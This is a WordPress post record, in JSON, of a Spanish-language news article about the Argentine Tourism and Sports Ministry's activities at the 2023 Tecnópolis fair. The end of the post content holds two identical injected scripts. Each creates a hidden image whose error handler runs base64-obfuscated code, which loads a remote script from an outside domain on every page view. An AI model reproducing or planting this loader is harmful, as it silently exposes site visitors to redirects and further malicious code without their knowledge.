{"id":2860,"date":"2023-07-16T14:34:34","date_gmt":"2023-07-16T17:34:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2860"},"modified":"2025-08-14T00:12:40","modified_gmt":"2025-08-14T03:12:40","slug":"turismo-y-deportes-dice-presente-en-la-vuelta-de-tecnopolis","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2860","title":{"rendered":"Turismo y Deportes dice presente en la vuelta de Tecn\u00f3polis"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Desde el s\u00e1bado 15 de julio se podr\u00e1n disfrutar diversas actividades para las vacaciones de invierno<\/em><\/h3>\n\n\n\n<p><strong>Tecn\u00f3polis vuelve a abrir sus puertas<\/strong>&nbsp;para dar inicio a la Megamuestra 2023, en su 12\u00ba edici\u00f3n. Ser\u00e1 bajo el lema \u201cLa potencia de lo colectivo\u201d, en el marco de los 40 a\u00f1os ininterrumpidos de democracia. La apertura se realizar\u00e1 el s\u00e1bado 15 de julio a las 12.<\/p>\n\n\n\n<p>En ese marco, el Ministerio de Turismo y Deportes de la Naci\u00f3n dir\u00e1 presente con&nbsp;<strong>tres grandes propuestas<\/strong>&nbsp;para todas las edades. Por un lado, el&nbsp;<strong>stand de Turismo Social<\/strong>&nbsp;exhibir\u00e1 el micro original de la Fundaci\u00f3n Eva Per\u00f3n restaurado y ofrecer\u00e1 actividades sobre las Unidades Tur\u00edsticas. A su vez, el&nbsp;<strong>Polo Deportes y Expresiones Urbanas<\/strong>&nbsp;desplegar\u00e1 variadas opciones que incluyen clases, torneos y exhibiciones. En tanto,&nbsp;<strong>Fiestas Argentinas<\/strong>&nbsp;presentar\u00e1 una nutrida programaci\u00f3n en el escenario del Patio Federal.<\/p>\n\n\n\n<p><strong>Stand de Turismo Social<\/strong><\/p>\n\n\n\n<p>Las Unidades Tur\u00edsticas Chapadmalal y Embalse son \u00edconos del turismo social en nuestro pa\u00eds y sin dudas forman parte del patrimonio hist\u00f3rico y emocional de argentinos y argentinas. En ese contexto, en el stand se podr\u00e1 visitar un colectivo original de la Fundaci\u00f3n Eva Per\u00f3n restaurado, y conocer su historia a trav\u00e9s de un video. En su \u00e9poca, fue utilizado para trasladar a turistas que visitaban las Unidades.<\/p>\n\n\n\n<p>Adem\u00e1s, se podr\u00e1 participar de una trivia de preguntas y respuestas para conocer m\u00e1s sobre el turismo social y fotografiarse como si se estuviera en Chapadmalal o Embalse. Tambi\u00e9n habr\u00e1 mapas para colorear y conocer los lugares donde est\u00e1n emplazadas las Unidades.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-07-13_at_12.24.56.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Polo Deportes y Expresiones Urbanas<\/strong><\/p>\n\n\n\n<p>Durante las vacaciones de invierno en julio habr\u00e1 parkour, acrobacias, breaking, camas el\u00e1sticas, tiro con arco, b\u00e1squet 3&#215;3 (clases y torneos abiertos), b\u00e1dminton, v\u00f3ley (clases, entrenamientos y exhibiciones), f\u00fatbol-tenis y teqball, raunet, palestra, pat\u00edn (clases y shows), tenis de mesa, skate y rollers. Las propuestas seguir\u00e1n durante el mes de agosto.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2023-07-12_at_14.22.11.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Escenario del Patio Federal<\/strong><\/p>\n\n\n\n<p>Fiestas Argentina propone una nutrida oferta para disfrutar en familia. Comenzar\u00e1 el domingo 16 de julio, desde las 14, con una tarde a puro tango, y continuar\u00e1 con todo el color de nuestras tradiciones los mi\u00e9rcoles, jueves y domingos de julio (durante las vacaciones de invierno) y los domingos de agosto (6, 20 y 27).<\/p>\n\n\n\n<p>La Fiesta del Salame Quintero, de Mercedes; la Fiesta Nacional de la Flor, de Escobar; la Fiesta del Dulce de Leche, de Ca\u00f1uelas; y el encuentro de Payadores, de San Vicente, son solo algunos de los encuentros que se dar\u00e1n lugar en la acci\u00f3n realizada en conjunto con el Ministerio de Cultura de la Naci\u00f3n.<\/p>\n\n\n\n<p><em>El parque se mantendr\u00e1 abierto del 15 al 30 de julio -de mi\u00e9rcoles a domingos de 12 a 19- y del 3 al 27 de agosto -jueves y viernes de 10 a 18 y s\u00e1bados, domingos y feriados de 12 a 19-.<\/em><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde el s\u00e1bado 15 de julio se podr\u00e1n disfrutar diversas actividades para las vacaciones de invierno Tecn\u00f3polis vuelve a abrir sus puertas&nbsp;para dar inicio a la Megamuestra 2023, en su 12\u00ba edici\u00f3n. Ser\u00e1 bajo el lema \u201cLa potencia de lo colectivo\u201d, en el marco de los 40 a\u00f1os ininterrumpidos de democracia. La apertura se realizar\u00e1 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2861,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2860","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2860"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2860"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2860\/revisions"}],"predecessor-version":[{"id":7024,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2860\/revisions\/7024"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2861"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}